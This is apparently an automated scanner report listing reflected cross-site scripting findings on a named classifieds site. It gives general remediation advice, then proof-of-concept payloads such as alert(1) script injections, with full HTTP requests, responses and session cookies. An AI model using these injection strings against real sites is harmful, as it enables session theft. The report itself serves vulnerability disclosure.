Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73643"><script>alert(1)</script>ca42b1cd3fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?73643"><script>alert(1)</script>ca42b1cd3fd=1 HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:46:48 GMT Connection: close Vary: Accept-Encoding Set-Cookie: otu=21dfe8467985784d85c8420cd5bb156a; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=e2ff55ee5caa6568664f56968c2be7a9; path=/; domain=.oodle.com Set-Cookie: a=dT1BMTdDQkU2MzREODRCM0M3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQwNzt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 55731
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33bc5"><script>alert(1)</script>3aa57c103d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:58 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzODt9; path=/; domain=.oodle.com Content-Length: 24873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]... <meta property="og:url" content="http://www.oodle.com/event33bc5"><script>alert(1)</script>3aa57c103d0/track-first-view/?event_name=first_view&partner=www&masquerade=www&country=USA®ion=18&page=home&cm_page=homepage&event_type=unique&agent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+Appl ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4b53"-alert(1)-"404c2eab10d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:59 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzOTt9; path=/; domain=.oodle.com Content-Length: 24826
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3295a"-alert(1)-"2b911b38e10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU0Mjt9; path=/; domain=.oodle.com Content-Length: 24820
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae66"><script>alert(1)</script>86ea5a7f0a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:01 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU0MTt9; path=/; domain=.oodle.com Content-Length: 24871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]... <meta property="og:url" content="http://www.oodle.com/event/track-first-view8ae66"><script>alert(1)</script>86ea5a7f0a8/?event_name=first_view&partner=www&masquerade=www&country=USA®ion=18&page=home&cm_page=homepage&event_type=unique&agent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.16+ ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43440"-alert(1)-"58d221ae15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event43440"-alert(1)-"58d221ae15/track-named/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:55 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzNTt9; path=/; domain=.oodle.com Content-Length: 24077
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6730a"><script>alert(1)</script>ea43be6c0ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event6730a"><script>alert(1)</script>ea43be6c0ac/track-named/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:54 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzNDt9; path=/; domain=.oodle.com Content-Length: 24147
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebda7"><script>alert(1)</script>9962c398fef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event/track-namedebda7"><script>alert(1)</script>9962c398fef/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:58 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzODt9; path=/; domain=.oodle.com Content-Length: 24135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98196"-alert(1)-"783b7b975d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event/track-named98196"-alert(1)-"783b7b975d6/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:48:59 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjUzOTt9; path=/; domain=.oodle.com Content-Length: 24088
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baba"><script>alert(1)</script>b0820c2019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:23 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU2Mzt9; path=/; domain=.oodle.com Content-Length: 23781
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77379"-alert(1)-"d815d197cf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:24 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU2Mzt9; path=/; domain=.oodle.com Content-Length: 23729
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edd4b"-alert(1)-"e7e47749d10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infoedd4b"-alert(1)-"e7e47749d10/about/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:03 GMT Content-Length: 23729 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE2Mzt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe21"><script>alert(1)</script>406c7585d21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoafe21"><script>alert(1)</script>406c7585d21/about/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:02 GMT Content-Length: 23806 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE2Mjt9; path=/; domain=.oodle.com
1.14. http://www.oodle.com/info/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90720"-alert(1)-"e9ed4e3c6c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/about/?90720"-alert(1)-"e9ed4e3c6c8=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:51 GMT Content-Length: 20983 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE1MTt9; path=/; domain=.oodle.com
1.15. http://www.oodle.com/info/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1397"><script>alert(1)</script>056c3249a70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
